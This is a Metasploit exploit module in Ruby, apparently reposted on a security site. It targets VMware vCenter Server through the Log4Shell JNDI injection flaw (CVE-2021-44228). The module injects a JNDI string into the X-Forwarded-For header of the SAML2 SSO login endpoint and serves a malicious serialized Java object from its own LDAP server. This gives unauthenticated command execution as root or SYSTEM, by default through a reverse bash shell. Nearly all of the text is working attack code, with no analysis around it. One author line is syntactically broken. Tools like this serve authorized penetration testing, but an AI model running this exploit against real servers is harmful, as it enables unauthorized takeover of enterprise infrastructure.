VMware vCenter Server Unauthenticated Log4Shell JNDI Injection Remote Code Execution – Torchsec
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::JndiInjection
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::CheckModule
prepend Msf::Exploit::Remote::AutoCheck
def initialize(_info = {})
super(
'Name' => 'VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell)',
'Description' => %q{
VMware vCenter Server is affected by the Log4Shell vulnerability whereby a JNDI string can sent to the server
that will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS
command execution in the context of the root user in the case of the Linux virtual appliance and SYSTEM on
Windows.
This module will start an LDAP server that the target will need to connect to. This exploit uses the logon page
vector.
},
'Author' => [
'Spencer McIntyre', # this exploit module and JNDI/LDAP lib stuff
'RageLtMan
'jbaines-r7', # vCenter research
'w3bd3vil' # vCenter PoC https://twitter.com/w3bd3vil/status/1469814463414951937
],
'References' => [
[ 'CVE', '2021-44228' ],
[ 'URL', 'https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis'],
[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0028.html' ],
[ 'URL', 'https://twitter.com/w3bd3vil/status/1469814463414951937' ]
],
'DisclosureDate' => '2021-12-09',
'License' => MSF_LICENSE,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true,
'SRVPORT' => 389,
'WfsDelay' => 30,
'CheckModule' => 'auxiliary/scanner/http/log4shell_scanner'
},
'Targets' => [
[
'Windows', {
'Platform' => 'win'
},
],
[
'Linux', {
'Platform' => 'unix',
'Arch' => [ARCH_CMD],
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash'
}
},
]
],
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'AKA' => ['Log4Shell', 'LogJam'],
'Reliability' => [REPEATABLE_SESSION],
'RelatedModules' => [
'auxiliary/scanner/http/log4shell_scanner',
'exploit/multi/http/log4shell_header_injection'
]
}
)
register_options([
OptString.new('TARGETURI', [ true, 'Base path', '/'])
])
end
def check
validate_configuration!
return Exploit::CheckCode::Unknown if tenant.nil?
super
end
def check_options
{
'LDAP_TIMEOUT' => datastore['WfsDelay'],
'HTTP_HEADER' => 'X-Forwarded-For',
'TARGETURI' => normalize_uri(target_uri, 'websso', 'SAML2', 'SSO', tenant) + '?SAMLRequest=',
'HEADERS_FILE' => nil,
'URIS_FILE' => nil
}
end
def build_ldap_search_response_payload
return [] if @search_received
@search_received = true
print_good('Delivering the serialized Java object to execute the payload...')
build_ldap_search_response_payload_inline('BeanFactory')
end
def tenant
return @tenant unless @tenant.nil?
res = send_request_cgi('uri' => normalize_uri(target_uri, 'ui', 'login'))
return nil unless res&.code == 302
return nil unless res.headers['Location'] =~ %r{websso/SAML2/SSO/([^/]+)?}
@tenant = Regexp.last_match(1)
end
def trigger
@search_received = false
# HTTP request initiator
send_request_cgi(
'uri' => normalize_uri(target_uri, 'websso', 'SAML2', 'SSO', tenant) + '?SAMLRequest=',
'headers' => { 'X-Forwarded-For' => jndi_string }
)
end
def exploit
validate_configuration!
start_service
trigger
sleep(datastore['WfsDelay'])
handler
ensure
cleanup
end
end
Gloss